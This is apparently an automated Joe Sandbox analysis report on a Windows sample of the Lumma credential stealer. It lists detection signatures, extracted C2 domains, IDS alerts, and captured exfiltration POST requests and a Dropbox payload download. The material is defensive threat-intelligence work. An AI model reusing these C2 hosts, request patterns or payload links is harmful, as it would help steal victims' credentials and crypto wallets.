Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yTRd6nkLWV.exe

Overview

General Information

Sample name:yTRd6nkLWV.exe
renamed because original name is a hash value
Original sample name:276b08cdfcba38b36290db8a3162df343ba0f2bc3d3e48d22928ae61480b8183.exe
Analysis ID:1590540
MD5:d71663e0a0164a482c1ffc9d2c06539f
SHA1:25030448b108c3b50fcba933dd7b472d3570dbf4
SHA256:276b08cdfcba38b36290db8a3162df343ba0f2bc3d3e48d22928ae61480b8183
Tags:exeTHSUPPORTSERVICESLTDuser-JAMESWT_MHT
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates HTML files with .exe extension (expired dropper behavior)
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • yTRd6nkLWV.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\yTRd6nkLWV.exe" MD5: D71663E0A0164A482C1FFC9D2C06539F)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["leggelatez.lat", "savorraiykj.lat", "kickykiduz.lat", "finickypwk.lat", "washyceehsu.lat", "bloodyswif.lat", "shoefeatthe.lat", "miniatureyu.lat"], "Build id": "dll--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000001.00000003.1473028075.0000000000706000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
        • 0x50fbe:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
        • 0x54554:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
        Process Memory Space: yTRd6nkLWV.exe PID: 7532JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: yTRd6nkLWV.exe PID: 7532JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: yTRd6nkLWV.exe PID: 7532JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T08:55:30.340433+010020283713Unknown Traffic192.168.2.749784104.102.49.254443TCP
              2025-01-14T08:55:31.723597+010020283713Unknown Traffic192.168.2.749795188.114.96.3443TCP
              2025-01-14T08:55:32.657578+010020283713Unknown Traffic192.168.2.749801188.114.96.3443TCP
              2025-01-14T08:55:34.216699+010020283713Unknown Traffic192.168.2.749812188.114.96.3443TCP
              2025-01-14T08:55:35.773469+010020283713Unknown Traffic192.168.2.749825188.114.96.3443TCP
              2025-01-14T08:55:37.163604+010020283713Unknown Traffic192.168.2.749838188.114.96.3443TCP
              2025-01-14T08:55:38.722180+010020283713Unknown Traffic192.168.2.749849188.114.96.3443TCP
              2025-01-14T08:55:40.356462+010020283713Unknown Traffic192.168.2.749860188.114.96.3443TCP
              2025-01-14T08:55:42.730990+010020283713Unknown Traffic192.168.2.749876188.114.96.3443TCP
              2025-01-14T08:55:43.859968+010020283713Unknown Traffic192.168.2.749883162.125.66.18443TCP
              2025-01-14T08:55:45.745487+010020283713Unknown Traffic192.168.2.749897162.125.66.15443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T08:55:32.157732+010020546531A Network Trojan was detected192.168.2.749795188.114.96.3443TCP
              2025-01-14T08:55:33.142625+010020546531A Network Trojan was detected192.168.2.749801188.114.96.3443TCP
              2025-01-14T08:55:43.203229+010020546531A Network Trojan was detected192.168.2.749876188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T08:55:32.157732+010020498361A Network Trojan was detected192.168.2.749795188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T08:55:33.142625+010020498121A Network Trojan was detected192.168.2.749801188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T08:55:29.512052+010020591891Domain Observed Used for C2 Detected192.168.2.7604181.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T08:55:29.590693+010020591911Domain Observed Used for C2 Detected192.168.2.7639491.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T08:55:29.565601+010020591991Domain Observed Used for C2 Detected192.168.2.7637641.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T08:55:29.536919+010020592011Domain Observed Used for C2 Detected192.168.2.7508171.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T08:55:29.555067+010020592031Domain Observed Used for C2 Detected192.168.2.7550201.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T08:55:29.576398+010020592071Domain Observed Used for C2 Detected192.168.2.7571221.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T08:55:29.501594+010020592091Domain Observed Used for C2 Detected192.168.2.7539261.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T08:55:29.525032+010020592111Domain Observed Used for C2 Detected192.168.2.7538531.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T08:55:36.313357+010020480941Malware Command and Control Activity Detected192.168.2.749825188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T08:55:40.360671+010028438641A Network Trojan was detected192.168.2.749860188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T08:55:30.913240+010028586661Domain Observed Used for C2 Detected192.168.2.749784104.102.49.254443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: yTRd6nkLWV.exe.7532.1.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["leggelatez.lat", "savorraiykj.lat", "kickykiduz.lat", "finickypwk.lat", "washyceehsu.lat", "bloodyswif.lat", "shoefeatthe.lat", "miniatureyu.lat"], "Build id": "dll--"}
              Source: yTRd6nkLWV.exeVirustotal: Detection: 8%Perma Link
              Source: yTRd6nkLWV.exeReversingLabs: Detection: 36%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.1% probability
              Source: yTRd6nkLWV.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: yTRd6nkLWV.exeStatic PE information: certificate valid
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49784 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49795 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49801 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49812 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49825 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49838 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49849 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49860 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49876 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.7:49883 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.7:49897 version: TLS 1.2

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2059199 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat) : 192.168.2.7:63764 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2059201 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat) : 192.168.2.7:50817 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2059209 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat) : 192.168.2.7:53926 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2059207 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat) : 192.168.2.7:57122 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2059203 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat) : 192.168.2.7:55020 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2059191 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat) : 192.168.2.7:63949 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2059189 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat) : 192.168.2.7:60418 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2059211 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat) : 192.168.2.7:53853 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49801 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49801 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49825 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49795 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49795 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49876 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49784 -> 104.102.49.254:443
              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.7:49860 -> 188.114.96.3:443
              Source: Malware configuration extractorURLs: leggelatez.lat
              Source: Malware configuration extractorURLs: savorraiykj.lat
              Source: Malware configuration extractorURLs: kickykiduz.lat
              Source: Malware configuration extractorURLs: finickypwk.lat
              Source: Malware configuration extractorURLs: washyceehsu.lat
              Source: Malware configuration extractorURLs: bloodyswif.lat
              Source: Malware configuration extractorURLs: shoefeatthe.lat
              Source: Malware configuration extractorURLs: miniatureyu.lat
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile created: 0A8O8L4RV6JWV8ND8.exe.1.dr
              Source: Joe Sandbox ViewIP Address: 162.125.66.18 162.125.66.18
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49795 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49825 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49838 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49812 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49784 -> 104.102.49.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49876 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49883 -> 162.125.66.18:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49801 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49860 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49897 -> 162.125.66.15:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49849 -> 188.114.96.3:443
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: aleksandr-block.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: aleksandr-block.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RC6TGEQHH2SELUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12812Host: aleksandr-block.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=URVIBBBZEWIGERUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15050Host: aleksandr-block.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=F18QAAKNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20339Host: aleksandr-block.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IB5T9XD3ZG7CKBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1345Host: aleksandr-block.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZKRWBOLO1YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 574883Host: aleksandr-block.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: aleksandr-block.com
              Source: global trafficHTTP traffic detected: GET /scl/fi/tzw461qf44namwoprtqi1/channels424_banner.jpg?rlkey=ggwr95slh92f24jnfjirjyzys&st=8tyyz5o7&dl=1 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: www.dropbox.com
              Source: global trafficHTTP traffic detected: GET /cd/0/get/CiJJBY9fg1s-lnZensg4nW2mGy-2Gq-GsZR54eh5vxAS-adfp4y9q3FJLldfmw9w0FyJuGGMus-FkcNVlxAuTQ8Ra9WJRYaA9VqEUMfCd5FVo2eMnYMFHqbIaiWnVg_3Z1OdxGxQ9KtAX_qhrQxKC2DD/file?dl=1# HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ucc3847efbfdc5176cc975eba0f9.dl.dropboxusercontent.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: global trafficHTTP traffic detected: GET /scl/fi/tzw461qf44namwoprtqi1/channels424_banner.jpg?rlkey=ggwr95slh92f24jnfjirjyzys&st=8tyyz5o7&dl=1 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: www.dropbox.com
              Source: global trafficHTTP traffic detected: GET /cd/0/get/CiJJBY9fg1s-lnZensg4nW2mGy-2Gq-GsZR54eh5vxAS-adfp4y9q3FJLldfmw9w0FyJuGGMus-FkcNVlxAuTQ8Ra9WJRYaA9VqEUMfCd5FVo2eMnYMFHqbIaiWnVg_3Z1OdxGxQ9KtAX_qhrQxKC2DD/file?dl=1# HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ucc3847efbfdc5176cc975eba0f9.dl.dropboxusercontent.com
              Source: yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ https://s.ytimg.com; o equals www.youtube.com (Youtube)
              Source: yTRd6nkLWV.exe, 00000001.00000003.1558338882.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1528399384.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1473028075.00000000006F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /www.youtube.com/ https://s.ytimg.com; o equals www.youtube.com (Youtube)
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: child-src https://www.dropbox.com/static/serviceworker/ blob: ; img-src https://* data: blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; font-src https://* data: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; frame-ancestors 'self' https://*.dropbox.com ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; base-uri 'self' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js 'nonce-ovuBZL7C34mYkcNGttZRSDeZOHA=' equals www.yahoo.com (Yahoo)
              Source: yTRd6nkLWV.exeString found in binary or memory: cha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowe equals www.youtube.com (Youtube)
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: eropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; font-src https://* data: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; frame-ancestors 'self' https://*.dropbox.com ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; base-uri 'self' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js 'nonce-ovuBZL7C34mYkcNGttZRSDeZOHA=' equals www.yahoo.com (Yahoo)
